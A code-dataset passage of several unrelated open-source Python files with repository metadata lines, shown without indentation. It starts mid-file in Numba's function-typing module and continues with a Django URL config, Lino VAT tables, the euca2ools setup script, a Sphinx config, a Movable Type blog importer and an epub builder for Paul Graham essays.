usable.append((temp_cls, hw_clazz, ix))
# sort templates based on target specificity
def key(x):
return target_hw.__mro__.index(x[1])
order = [x[0] for x in sorted(usable, key=key)]
if not order:
msg = (f"Function resolution cannot find any matches for function"
f" '{self.key[0]}' for the current target: '{target_hw}'.")
raise errors.UnsupportedError(msg)
self._depth += 1
for temp_cls in order:
temp = temp_cls(context)
# The template can override the default and prefer literal args
choice = prefer_lit if temp.prefer_literal else prefer_not
for uselit in choice:
try:
if uselit:
sig = temp.apply(args, kws)
else:
nolitargs = tuple([_unlit_non_poison(a) for a in args])
nolitkws = {k: _unlit_non_poison(v)
for k, v in kws.items()}
sig = temp.apply(nolitargs, nolitkws)
except Exception as e:
sig = None
failures.add_error(temp, False, e, uselit)
else:
if sig is not None:
self._impl_keys[sig.args] = temp.get_impl_key(sig)
self._depth -= 1
return sig
else:
registered_sigs = getattr(temp, 'cases', None)
if registered_sigs is not None:
msg = "No match for registered cases:\n%s"
msg = msg % '\n'.join(" * {}".format(x) for x in
registered_sigs)
else:
msg = 'No match.'
failures.add_error(temp, True, msg, uselit)
failures.raise_error()
def get_call_signatures(self):
sigs = []
is_param = False
for temp in self.templates:
sigs += getattr(temp, 'cases', [])
is_param = is_param or hasattr(temp, 'generic')
return sigs, is_param
class Function(BaseFunction, Opaque):
"""
Type class for builtin functions implemented by Numba.
"""
class BoundFunction(Callable, Opaque):
"""
A function with an implicit first argument (denoted as *this* below).
"""
def __init__(self, template, this):
# Create a derived template with an attribute *this*
newcls = type(template.__name__ + '.' + str(this), (template,),
dict(this=this))
self.template = newcls
self.typing_key = self.template.key
self.this = this
name = "%s(%s for %s)" % (self.__class__.__name__,
self.typing_key, self.this)
super(BoundFunction, self).__init__(name)
def unify(self, typingctx, other):
if (isinstance(other, BoundFunction) and
self.typing_key == other.typing_key):
this = typingctx.unify_pairs(self.this, other.this)
if this is not None:
# XXX is it right that both template instances are distinct?
return self.copy(this=this)
def copy(self, this):
return type(self)(self.template, this)
@property
def key(self):
return self.typing_key, self.this
def get_impl_key(self, sig):
"""
Get the implementation key (used by the target context) for the
given signature.
"""
return self.typing_key
def get_call_type(self, context, args, kws):
template = self.template(context)
literal_e = None
nonliteral_e = None
out = None
choice = [True, False] if template.prefer_literal else [False, True]
for uselit in choice:
if uselit:
# Try with Literal
try:
out = template.apply(args, kws)
except Exception as exc:
if isinstance(exc, errors.ForceLiteralArg):
raise exc
literal_e = exc
out = None
else:
break
else:
# if the unliteral_args and unliteral_kws are the same as the
# literal ones, set up to not bother retrying
unliteral_args = tuple([_unlit_non_poison(a) for a in args])
unliteral_kws = {k: _unlit_non_poison(v)
for k, v in kws.items()}
skip = unliteral_args == args and kws == unliteral_kws
# If the above template application failed and the non-literal
# args are different to the literal ones, try again with
# literals rewritten as non-literals
if not skip and out is None:
try:
out = template.apply(unliteral_args, unliteral_kws)
except Exception as exc:
if isinstance(exc, errors.ForceLiteralArg):
if template.prefer_literal:
# For template that prefers literal types,
# reaching here means that the literal types
# have failed typing as well.
raise exc
nonliteral_e = exc
else:
break
if out is None and (nonliteral_e is not None or literal_e is not None):
header = "- Resolution failure for {} arguments:\n{}\n"
tmplt = _termcolor.highlight(header)
if config.DEVELOPER_MODE:
indent = ' ' * 4
def add_bt(error):
if isinstance(error, BaseException):
# if the error is an actual exception instance, trace it
bt = traceback.format_exception(type(error), error,
error.__traceback__)
else:
bt = [""]
nd2indent = '\n{}'.format(2 * indent)
errstr = _termcolor.reset(nd2indent +
nd2indent.join(_bt_as_lines(bt)))
return _termcolor.reset(errstr)
else:
add_bt = lambda X: ''
def nested_msg(literalness, e):
estr = str(e)
estr = estr if estr else (str(repr(e)) + add_bt(e))
new_e = errors.TypingError(textwrap.dedent(estr))
return tmplt.format(literalness, str(new_e))
raise errors.TypingError(nested_msg('literal', literal_e) +
nested_msg('non-literal', nonliteral_e))
return out
def get_call_signatures(self):
sigs = getattr(self.template, 'cases', [])
is_param = hasattr(self.template, 'generic')
return sigs, is_param
class MakeFunctionLiteral(Literal, Opaque):
pass
class _PickleableWeakRef(weakref.ref):
"""
Allow a weakref to be pickled.
Note that if the object referred to is not kept alive elsewhere in the
pickle, the weakref will immediately expire after being constructed.
"""
def __getnewargs__(self):
obj = self()
if obj is None:
raise ReferenceError("underlying object has vanished")
return (obj,)
class WeakType(Type):
"""
Base class for types parametered by a mortal object, to which only
a weak reference is kept.
"""
def _store_object(self, obj):
self._wr = _PickleableWeakRef(obj)
def _get_object(self):
obj = self._wr()
if obj is None:
raise ReferenceError("underlying object has vanished")
return obj
@property
def key(self):
return self._wr
def __eq__(self, other):
if type(self) is type(other):
obj = self._wr()
return obj is not None and obj is other._wr()
return NotImplemented
def __hash__(self):
return Type.__hash__(self)
class Dispatcher(WeakType, Callable, Dummy):
"""
Type class for @jit-compiled functions.
"""
def __init__(self, dispatcher):
self._store_object(dispatcher)
super(Dispatcher, self).__init__("type(%s)" % dispatcher)
def dump(self, tab=''):
print((f'{tab}DUMP {type(self).__name__}[code={self._code}, '
f'name={self.name}]'))
self.dispatcher.dump(tab=tab + ' ')
print(f'{tab}END DUMP')
def get_call_type(self, context, args, kws):
"""
Resolve a call to this dispatcher using the given argument types.
A signature returned and it is ensured that a compiled specialization
is available for it.
"""
template, pysig, args, kws = \
self.dispatcher.get_call_template(args, kws)
sig = template(context).apply(args, kws)
if sig:
sig = sig.replace(pysig=pysig)
return sig
def get_call_signatures(self):
sigs = self.dispatcher.nopython_signatures
return sigs, True
@property
def dispatcher(self):
"""
A strong reference to the underlying numba.dispatcher.Dispatcher
instance.
"""
return self._get_object()
def get_overload(self, sig):
"""
Get the compiled overload for the given signature.
"""
return self.dispatcher.get_overload(sig.args)
def get_impl_key(self, sig):
"""
Get the implementation key for the given signature.
"""
return self.get_overload(sig)
def unify(self, context, other):
return utils.unified_function_type((self, other), require_precise=False)
def can_convert_to(self, typingctx, other):
if isinstance(other, types.FunctionType):
if self.dispatcher.get_compile_result(other.signature):
return Conversion.safe
class ObjModeDispatcher(Dispatcher):
"""Dispatcher subclass that enters objectmode function.
"""
pass
class ExternalFunctionPointer(BaseFunction):
"""
A pointer to a native function (e.g. exported via ctypes or cffi).
*get_pointer* is a Python function taking an object
and returning the raw pointer value as an int.
"""
def __init__(self, sig, get_pointer, cconv=None):
from numba.core.typing.templates import (AbstractTemplate,
make_concrete_template,
signature)
from numba.core.types import ffi_forced_object
if sig.return_type == ffi_forced_object:
raise TypeError("Cannot return a pyobject from a external function")
self.sig = sig
self.requires_gil = any(a == ffi_forced_object for a in self.sig.args)
self.get_pointer = get_pointer
self.cconv = cconv
if self.requires_gil:
class GilRequiringDefn(AbstractTemplate):
key = self.sig
def generic(self, args, kws):
if kws:
raise TypeError("does not support keyword arguments")
# Make ffi_forced_object a bottom type to allow any type to
# be casted to it. This is the only place that support
# ffi_forced_object.
coerced = [actual if formal == ffi_forced_object else formal
for actual, formal
in zip(args, self.key.args)]
return signature(self.key.return_type, *coerced)
template = GilRequiringDefn
else:
template = make_concrete_template("CFuncPtr", sig, [sig])
super(ExternalFunctionPointer, self).__init__(template)
@property
def key(self):
return self.sig, self.cconv, self.get_pointer
class ExternalFunction(Function):
"""
A named native function (resolvable by LLVM) accepting an explicit
signature. For internal use only.
"""
def __init__(self, symbol, sig):
from numba.core import typing
self.symbol = symbol
self.sig = sig
template = typing.make_concrete_template(symbol, symbol, [sig])
super(ExternalFunction, self).__init__(template)
@property
def key(self):
return self.symbol, self.sig
class NamedTupleClass(Callable, Opaque):
"""
Type class for namedtuple classes.
"""
def __init__(self, instance_class):
self.instance_class = instance_class
name = "class(%s)" % (instance_class)
super(NamedTupleClass, self).__init__(name)
def get_call_type(self, context, args, kws):
# Overridden by the __call__ constructor resolution in
# typing.collections
return None
def get_call_signatures(self):
return (), True
@property
def key(self):
return self.instance_class
class NumberClass(Callable, DTypeSpec, Opaque):
"""
Type class for number classes (e.g. "np.float64").
"""
def __init__(self, instance_type):
self.instance_type = instance_type
name = "class(%s)" % (instance_type,)
super(NumberClass, self).__init__(name)
def get_call_type(self, context, args, kws):
# Overridden by the __call__ constructor resolution in typing.builtins
return None
def get_call_signatures(self):
return (), True
@property
def key(self):
return self.instance_type
@property
def dtype(self):
return self.instance_type
class RecursiveCall(Opaque):
"""
Recursive call to a Dispatcher.
"""
_overloads = None
def __init__(self, dispatcher_type):
assert isinstance(dispatcher_type, Dispatcher)
self.dispatcher_type = dispatcher_type
name = "recursive(%s)" % (dispatcher_type,)
super(RecursiveCall, self).__init__(name)
# Initializing for the first time
if self._overloads is None:
self._overloads = {}
@property
def overloads(self):
return self._overloads
@property
def key(self):
return self.dispatcher_type
| stonebig/numba | numba/core/types/functions.py | Python | bsd-2-clause | 26,542 |
from django.conf.urls import patterns, url
from packages.simple.views import PackageIndex, PackageDetail
handler404 = "packages.simple.views.not_found"
urlpatterns = patterns("",
url(r"^$", PackageIndex.as_view(), name="simple_package_index"),
url(r"^(?P<slug>[^/]+)/(?:(?P<version>[^/]+)/)?$", PackageDetail.as_view(), name="simple_package_detail"),
)
| crate-archive/crate-site | crateweb/apps/packages/simple/urls.py | Python | bsd-2-clause | 364 |
# Copyright 2012-2017 Luc Saffre
# License: BSD (see file COPYING for details)
from __future__ import unicode_literals
from __future__ import print_function
from lino.api import dd, rt, _
# from etgen.html import E
from .mixins import VatDocument
from lino_xl.lib.ledger.ui import PartnerVouchers, ByJournal, PrintableByJournal
from lino_xl.lib.ledger.choicelists import TradeTypes
from lino_xl.lib.ledger.choicelists import VoucherTypes
from lino_xl.lib.ledger.roles import LedgerUser, LedgerStaff
from lino_xl.lib.ledger.mixins import ItemsByVoucher
from lino_xl.lib.ledger.mixins import VouchersByPartnerBase
from .choicelists import VatRegimes
# class VatRules(dd.Table):
# model = 'vat.VatRule'
# required_roles = dd.login_required(LedgerStaff)
# column_names = "seqno vat_area trade_type vat_class vat_regime \
# #start_date #end_date rate can_edit \
# vat_account vat_returnable vat_returnable_account *"
# hide_sums = True
# auto_fit_column_widths = True
# order_by = ['seqno']
class InvoiceDetail(dd.DetailLayout):
main = "general ledger"
totals = """
total_base
total_vat
total_incl
workflow_buttons
"""
general = dd.Panel("""
id entry_date partner user
due_date your_ref vat_regime #item_vat
ItemsByInvoice:60 totals:20
""", label=_("General"))
ledger = dd.Panel("""
journal accounting_period number narration
ledger.MovementsByVoucher
""", label=_("Ledger"))
class Invoices(PartnerVouchers):
required_roles = dd.login_required(LedgerUser)
model = 'vat.VatAccountInvoice'
order_by = ["-id"]
column_names = "entry_date id number_with_year partner total_incl user *"
detail_layout = InvoiceDetail()
insert_layout = """
journal partner
entry_date total_incl
"""
# start_at_bottom = True
class InvoicesByJournal(Invoices, ByJournal):
params_layout = "partner state start_period end_period user"
column_names = "number_with_year voucher_date due_date " \
"partner " \
"total_incl " \
"total_base total_vat user workflow_buttons *"
#~ "ledger_remark:10 " \
insert_layout = """
partner
entry_date total_incl
"""
class PrintableInvoicesByJournal(PrintableByJournal, Invoices):
label = _("Purchase journal")
VoucherTypes.add_item_lazy(InvoicesByJournal)
class ItemsByInvoice(ItemsByVoucher):
model = 'vat.InvoiceItem'
display_mode = 'grid'
column_names = "account title vat_class total_base total_vat total_incl"
class VouchersByPartner(VouchersByPartnerBase):
label = _("VAT vouchers")
column_names = "entry_date voucher total_incl total_base total_vat"
_voucher_base = VatDocument
@dd.virtualfield('vat.VatAccountInvoice.total_incl')
def total_incl(self, row, ar):
return row.total_incl
@dd.virtualfield('vat.VatAccountInvoice.total_base')
def total_base(self, row, ar):
return row.total_base
@dd.virtualfield('vat.VatAccountInvoice.total_vat')
def total_vat(self, row, ar):
return row.total_vat
class IntracomInvoices(PartnerVouchers):
_trade_type = None
editable = False
model = VatDocument
column_names = 'detail_pointer partner partner__vat_id vat_regime total_base total_vat total_incl'
# order_by = ['entry_date', 'partner']
# order_by = ['entry_date', 'id']
# order_by = ['entry_date', 'number']
order_by = ['number']
hidden_elements = frozenset(
"""entry_date journal__trade_type journal number
journal__trade_type state user""".split())
@classmethod
def get_request_queryset(cls, ar, **kwargs):
fkw = dict()
if cls._trade_type is not None:
fkw.update(journal__trade_type=cls._trade_type)
regimes = set([r for r in VatRegimes.get_list_items()
if r.name.startswith('intracom')])
# (VatRegimes.intracom, VatRegimes.intracom_supp)
fkw.update(vat_regime__in=regimes)
qs = super(IntracomInvoices, cls).get_request_queryset(ar, **fkw)
# raise Exception("20170905 {}".format(qs.query))
return qs
dd.update_field(
IntracomInvoices, 'detail_pointer', verbose_name=_("Invoice"))
class IntracomSales(IntracomInvoices):
_trade_type = TradeTypes.sales
label = _("Intra-Community sales")
class IntracomPurchases(IntracomInvoices):
_trade_type = TradeTypes.purchases
label = _("Intra-Community purchases")
| khchine5/xl | lino_xl/lib/vat/desktop.py | Python | bsd-2-clause | 4,520 |
# Copyright 2009-2015 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from distutils.command.build_py import build_py
from distutils.command.build_scripts import build_scripts
from distutils.command.install_scripts import install_scripts
from distutils.command.sdist import sdist
import glob
import os.path
import sys
from setuptools import find_packages, setup
from euca2ools import __version__
REQUIREMENTS = ['lxml',
'PyYAML',
'requestbuilder>=0.4',
'requests',
'six>=1.4']
if sys.version_info < (2, 7):
REQUIREMENTS.append('argparse')
# Cheap hack: install symlinks separately from regular files.
# cmd.copy_tree accepts a preserve_symlinks option, but when we call
# ``setup.py install'' more than once the method fails when it encounters
# symlinks that are already there.
class build_scripts_except_symlinks(build_scripts):
'''Like build_scripts, but ignoring symlinks'''
def copy_scripts(self):
orig_scripts = self.scripts
self.scripts = [script for script in self.scripts
if not os.path.islink(script)]
build_scripts.copy_scripts(self)
self.scripts = orig_scripts
class install_scripts_and_symlinks(install_scripts):
'''Like install_scripts, but also replicating nonexistent symlinks'''
def run(self):
install_scripts.run(self)
# Replicate symlinks if they don't exist
for script in self.distribution.scripts:
if os.path.islink(script):
target = os.readlink(script)
newlink = os.path.join(self.install_dir,
os.path.basename(script))
if not os.path.exists(newlink):
os.symlink(target, newlink)
class build_py_with_git_version(build_py):
'''Like build_py, but also hardcoding the version in __init__.__version__
so it's consistent even outside of the source tree'''
def build_module(self, module, module_file, package):
build_py.build_module(self, module, module_file, package)
print module, module_file, package
if module == '__init__' and '.' not in package:
version_line = "__version__ = '{0}'\n".format(__version__)
old_init_name = self.get_module_outfile(self.build_lib, (package,),
module)
new_init_name = old_init_name + '.new'
with open(new_init_name, 'w') as new_init:
with open(old_init_name) as old_init:
for line in old_init:
if line.startswith('__version__ ='):
new_init.write(version_line)
else:
new_init.write(line)
new_init.flush()
os.rename(new_init_name, old_init_name)
class sdist_with_git_version(sdist):
'''Like sdist, but also hardcoding the version in __init__.__version__ so
it's consistent even outside of the source tree'''
def make_release_tree(self, base_dir, files):
sdist.make_release_tree(self, base_dir, files)
version_line = "__version__ = '{0}'\n".format(__version__)
old_init_name = os.path.join(base_dir, 'euca2ools/__init__.py')
new_init_name = old_init_name + '.new'
with open(new_init_name, 'w') as new_init:
with open(old_init_name) as old_init:
for line in old_init:
if line.startswith('__version__ ='):
new_init.write(version_line)
else:
new_init.write(line)
new_init.flush()
os.rename(new_init_name, old_init_name)
setup(name="euca2ools",
version=__version__,
description="Eucalyptus Command Line Tools",
long_description="Eucalyptus Command Line Tools",
author="Eucalyptus Systems, Inc.",
author_email="[email protected]",
url="http://www.eucalyptus.com",
scripts=sum((glob.glob('bin/euare-*'),
glob.glob('bin/euca-*'),
glob.glob('bin/euform-*'),
glob.glob('bin/euimage-*'),
glob.glob('bin/eulb-*'),
glob.glob('bin/euscale-*'),
glob.glob('bin/euwatch-*')),
[]),
data_files=[('share/man/man1', glob.glob('man/*.1')),
('share/man/man5', glob.glob('man/*.5')),
('share/man/man7', glob.glob('man/*.7'))],
packages=find_packages(),
install_requires=REQUIREMENTS,
license='BSD (Simplified)',
platforms='Posix; MacOS X',
classifiers=['Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: Simplified BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet'],
cmdclass={'build_py': build_py_with_git_version,
'build_scripts': build_scripts_except_symlinks,
'install_scripts': install_scripts_and_symlinks,
'sdist': sdist_with_git_version})
| nagyistoce/euca2ools | setup.py | Python | bsd-2-clause | 6,806 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Hutte documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 27 23:08:58 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo',
'rubydomain'
]
primary_domain = 'rb'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Hutte'
copyright = '2015, Bastien Léonard'
author = 'Bastien Léonard'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
highlight_language = 'ruby'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Huttedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Hutte.tex', 'Hutte Documentation',
'Bastien Léonard', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'hutte', 'Hutte Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Hutte', 'Hutte Documentation',
author, 'Hutte', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
| bastienleonard/hutte | doc/sphinx/conf.py | Python | bsd-2-clause | 11,279 |
from optparse import make_option
import os
import shutil
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
import MySQLdb
from blog.models import Blog, Post, Asset
class Command(BaseCommand):
help = 'Import blog posts from Movable Type'
option_list = BaseCommand.option_list + (
make_option('-d',
dest='database',
help='The MT database name'),
make_option('-u',
dest='user',
help='The MT database user'),
make_option('-p',
dest='password',
help='The MT database password'),
make_option('-r',
dest='root',
help='The MT root directory (for copying image files)'),
make_option('-i',
dest='src_blog_id',
help='The MT blog ID to copy'),
make_option('-b',
dest='dst_blog_id',
help='The Django destionation blog id. Should exist.'))
def handle(self, *args, **options):
blog = Blog.objects.get(id=options['dst_blog_id'])
blog.ensure_assets_directory()
db = MySQLdb.Connect(db=options['database'], user=options['user'], passwd=options['password'])
entry_cursor = db.cursor()
entry_cursor.execute('''
select e.entry_id, e.entry_basename, e.entry_modified_on, e.entry_title, e.entry_text,
a.author_basename, a.author_email, a.author_nickname
from mt_entry as e, mt_author as a
where e.entry_blog_id = %s
and e.entry_author_id = a.author_id''' % options['src_blog_id'])
print list(entry_cursor)
for row in list(entry_cursor):
row = dict(zip(['id', 'basename', 'modified_on', 'title', 'body', 'username', 'email', 'first_name'], row))
print "create user %s" % row['username']
# Ensure the user exists.
try:
user = User.objects.get(username=row['username'])
except User.DoesNotExist:
user = User.objects.create_user(row['username'], row['email'])
user.first_name = row['first_name']
user.save()
# Create the blog post.
self.stdout.write('Create "%s"' % row['title'])
try:
post = Post.objects.get(blog=blog, user=user, slug=row['basename'])
except Post.DoesNotExist:
post = Post.objects.create(blog=blog,
user=user,
title=row['title'] or '<No Title>',
slug=row['basename'][:50],
pub_date=row['modified_on'],
body=row['body'])
# Create the files.
asset_cursor = db.cursor()
asset_cursor.execute('''select a.asset_file_path, a.asset_class
from mt_asset as a, mt_objectasset as oa
where oa.objectasset_object_id = %s
and oa.objectasset_blog_id = %s
and a.asset_id = oa.objectasset_asset_id''' % (row['id'], options['src_blog_id']))
for i, asset in enumerate(list(asset_cursor)):
position = i + 1
asset = dict(zip(['file_path', 'asset_class'], asset))
src_file = asset['file_path'].replace(r'%r', options['root'])
print src_file
dst_file = os.path.join(blog.assets_directory, os.path.basename(asset['file_path']))
if os.path.exists(src_file):
print src_file, "->", dst_file
shutil.copyfile(src_file, dst_file)
Asset.objects.create(post=post,
file_name=os.path.basename(dst_file),
type=asset['asset_class'],
description='',
position=position)
| nodebox/workshops | blog/management/commands/import_mt.py | Python | bsd-2-clause | 4,262 |
# -*- coding: utf-8 -*-
"""
Builds epub book out of Paul Graham's essays: http://paulgraham.com/articles.html
Author: Ola Sitarska <[email protected]>
Copyright: Licensed under the GPL-3 (http://www.gnu.org/licenses/gpl-3.0.html)
This script requires python-epub-library: http://code.google.com/p/python-epub-builder/
"""
import re, ez_epub, urllib2, genshi
#from BeautifulSoup import BeautifulSoup
from bs4 import BeautifulSoup
def addSection(link, title):
if not 'http' in link:
page = urllib2.urlopen('http://www.paulgraham.com/'+link).read()
soup = BeautifulSoup(page)
soup.prettify()
else:
page = urllib2.urlopen(link).read()
section = ez_epub.Section()
try:
section.title = title
print section.title
if not 'http' in link:
font = str(soup.findAll('table', {'width':'435'})[0].findAll('font')[0])
if not 'Get funded by' in font and not 'Watch how this essay was' in font and not 'Like to build things?' in font and not len(font)<100:
content = font
else:
content = ''
for par in soup.findAll('table', {'width':'435'})[0].findAll('p'):
content += str(par)
for p in content.split("<br /><br />"):
section.text.append(genshi.core.Markup(p))
#exception for Subject: Airbnb
for pre in soup.findAll('pre'):
section.text.append(genshi.core.Markup(pre))
else:
for p in str(page).replace("\n","<br />").split("<br /><br />"):
section.text.append(genshi.core.Markup(p))
except:
pass
return section
book = ez_epub.Book()
